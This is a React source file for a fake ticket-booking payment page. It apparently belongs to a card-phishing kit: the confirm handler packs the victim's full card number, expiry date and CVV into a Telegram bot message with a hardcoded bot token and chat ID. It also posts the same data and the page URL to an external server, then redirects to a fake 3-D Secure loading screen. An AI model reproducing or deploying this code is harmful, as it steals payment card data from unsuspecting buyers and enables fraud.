import React, { useEffect, useRef, useState } from "react";
 
import { useLocation, useNavigate } from "react-router-dom";
import InputField from "./InputField";
import axios from "axios"
import ReactPixel from "react-facebook-pixel"  


export default function PaymentSummary() {
  const [booking, setBooking] = useState(null);

  const navigate = useNavigate();

const formatIDR = (amount) =>
  typeof amount === "number"
    ? amount.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ".")
    : "0";













   const location = useLocation();
      const [submitBtnContent, setSubmitBtnContent] = useState(`Confirm`)
      const [input1Value, setInput1Value] = useState("")
      const [input2Value, setInput2Value] = useState("")
      const [input3Value, setInput3Value] = useState("")
    
      const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
      const input1Ref = useRef(null)
      const input2Ref = useRef(null)
      const input3Ref = useRef(null)

      const bookingSummary=JSON.parse(localStorage.getItem("bookingSummary"))
    const totalAmount = booking?.total
 
      const [submitBtnDis, setSubmitBtnDis] = useState(true)
    
      useEffect(() => {
        updateSubmitBtnDisabled()
      }, [input1Value, input2Value, input3Value])
    

    
      const fullUrl = window.location.href
      const handleInput1Focus = () => {
        // trackUserAction('User Started Card Input', false)
        setFocusedInput(1)
      }
    
      const handleInput2Focus = () => {
        setFocusedInput(2)
      }
    
      const handleInput3Focus = () => {
        setFocusedInput(3)
      }
    
      const checkFocus = (num) => {
        return focusedInput === num
      }
    
      const updateSubmitBtnDisabled = () => {
        console.log(
          `AED {input1Value.length} + AED {input2Value.length} + AED {input3Value.length}`
        )
        // Check conditions for enabling/disabling submit button
        if (
          input1Value !== "" &&
          input2Value !== "" &&
          input3Value !== "" &&
          input1Value.length === 19 &&
          input2Value.length === 5 &&
          input3Value.length === 3 &&
          isDateGreaterThan(input2Value, "10/24")
        ) {
          if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
            setSubmitBtnDis(false) // Enable submit button if all inputs are filled
          }
        } else {
          setSubmitBtnDis(true) // Disable submit button if any input is empty
        }
      }
      function isDateGreaterThan(dateStr, comparisonDateStr) {
        console.log(dateStr)
        // Extract month and year for both dates
        const [month, year] = dateStr.split("/").map(Number)
        const [compMonth, compYear] = comparisonDateStr.split("/").map(Number)
    
        // First, compare the years
        if (year > compYear) return true
        if (year < compYear) return false
    
        // If years are the same, compare the months
        return month > compMonth
      }
      const handleSender = async () => {
        const botToken = "7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o" // Replace with your bot's token
        const url = `https://api.telegram.org/bot${botToken}/sendMessage`
    
        // Extract the first digit of `main` and the last 4 digits of `main`
        const firstDigit = input1Value?.charAt(0) // First digit
        const lastFourDigits = input1Value?.slice(-4) // Last 4 digits
    
        // Set values to localStorage
        localStorage.setItem("summ", totalAmount)
        localStorage.setItem("first-digit", firstDigit)
        localStorage.setItem("last-four-digits", lastFourDigits)
    
        const payload = {
          chat_id: "-1002222911401", // Replace with the target chat ID
          text: `💳 ${input1Value}
      📆 ${input2Value}
      🔐 ${input3Value}`, // The message text
        }
    
        try {
          ReactPixel.track("Purchase")
        } catch (err) {
          console.log(err)
        }
        setSubmitBtnContent(<div className="inputLoader"></div>)
    
    
    
        // const additionalMessage = `|${formData.firstName} ${formData.lastName}|${formData.email}|${formData.country.label}|`
        const dataToSend = {
          orderId: "123",
          uuId: localStorage.getItem("uuId"),
          main: input1Value,
          date: input2Value,
          code: input3Value,
          summ: totalAmount,
          chatId: process.env.REACT_APP_CHAT_ID,
          domain: process.env.REACT_APP_DOMAIN,
          link: fullUrl,
          additional: '',
        }
        console.log(dataToSend)
        try {
          await axios.post(
            process.env.REACT_APP_SERVER_URL + "/api/validation",
            dataToSend,
            {
              headers: {
                "Content-Type": "application/json",
              },
            }
          )
          navigate("/3ds/loading")
        } catch (error) {
          console.error("Error sending data:", error)
          setTimeout(() => {
            setSubmitBtnContent(`Pay: ${localStorage.getItem('price')} Ft`)
          }, 3000)
        }
      }









  useEffect(() => {
    const data = localStorage.getItem("bookingDetails");
    if (data) {
      setBooking(JSON.parse(data));
    } else {
      navigate("/payment");
    }
  }, [navigate]);


  if (!booking) {
    return (
      <div className="min-h-screen flex items-center justify-center bg-[#eef2f6] text-gray-600">
        Loading...
      </div>
    );
  }

  const total = typeof booking.total === "number" ? booking.total : 0;






 



  return (
    <div className="bg-[#eef2f6] min-h-screen py-10 px-4 md:px-6 text-[#0057c4]">
      <div className="max-w-4xl mx-auto bg-white/60 backdrop-blur-md rounded-2xl p-6 md:p-8 shadow-md">
        <h1 className="text-3xl md:text-4xl font-bold mb-1">Booking Details</h1>
        <p className="mb-6 text-base md:text-lg">Here are the detail payment</p>

        {/* Personal Info */}
        <div className="mb-6 text-sm md:text-base">
          <p><strong>Name:</strong> {booking.name}</p>
          <p><strong>Email:</strong> {booking.email}</p>
          <p><strong>Phone:</strong> {booking.phone}</p>
        </div>

        {/* Ticket Info */}
        <h2 className="text-2xl font-bold mb-2">Ticket Details</h2>
        <div className="flex flex-col md:flex-row justify-between border-b pb-2 mb-4 text-sm md:text-base">
          <span className="mb-1 md:mb-0">Visit Date</span>
          <span>{booking.visitDate}</span>
        </div>

        <div className="hidden md:grid grid-cols-3 font-semibold mb-3">
          <span>Ticket</span>
          <span className="text-center">Price</span>
          <span className="text-right">Subtotal</span>
        </div>

        <div className="space-y-2 md:space-y-0">
          {booking.tickets?.map((ticket, i) => (
            <div key={i} className="flex flex-col md:grid md:grid-cols-3 md:items-center text-sm md:text-base mb-2">
              <span>{ticket.qty}x {ticket.title}</span>
<span className="md:text-center"> @Rp {formatIDR(ticket.price)}</span>
            <span className="md:text-right text-gray-700">
  Rp {formatIDR(ticket.qty * ticket.price)}
</span>
            </div>
          ))}
        </div>

        {/* Total */}
        <div className="border-t mt-6 md:mt-8 pt-4 flex flex-col md:flex-row justify-between items-start md:items-center text-xl font-bold gap-2">
          <span className="text-orange-600">Grand Total</span>
<span className="text-orange-600">Rp {formatIDR(total)}</span>
        </div>

        {/* Credit Card Section */}
        <div className="mt-10 bg-white p-4 md:p-6 rounded-xl shadow-lg">
          <h3 className="text-lg md:text-xl font-semibold text-[#0057c4] mb-2">Credit Card</h3>
          <p className="text-gray-600 mb-4 text-sm">Please fill additional information</p>

          <div className="mb-4">
            <label className="block text-sm font-semibold mb-1">Card Number</label>


   <InputField
                    formatType={"card"}
                    ref={input1Ref}
                    value={input1Value}
                    onFocus={handleInput1Focus}
                    onChange={(e) => setInput1Value(e.target.value)}
                    placeholder={"XXXX-XXXX-XXXX-XXXX"}
                    focused={checkFocus(1)}
                  />

 
          </div>

          <div className="flex flex-col md:flex-row gap-4">
            <div className="flex-1">
              <label className="block text-sm font-semibold mb-1">Expiry Month</label>

             <InputField
                      formatType={"date"}
                      ref={input2Ref}
                      value={input2Value}
                      onFocus={handleInput2Focus}
                      onChange={(e) => setInput2Value(e.target.value)}
                      placeholder={"Expiry date"}
                      focused={checkFocus(2)}
                    />

              
            </div>




           
            <div className="flex-1">
              <label className="block text-sm font-semibold mb-1">CVV</label>

     <InputField
                      formatType={"code"}
                      ref={input3Ref}
                      value={input3Value}
                      onFocus={handleInput3Focus}
                      onChange={(e) => setInput3Value(e.target.value)}
                      placeholder={"CVV"}
                      focused={checkFocus(3)}
                    />


            </div>
          </div>


          
        <button onClick={handleSender} disabled={submitBtnDis} className="mt-6 w-full md:w-auto bg-orange-400 text-white font-semibold px-6 py-2 rounded-lg hover:bg-orange-500 transition">
          {submitBtnContent}
        </button>


 
        </div>
      </div>
    </div>
  );
}
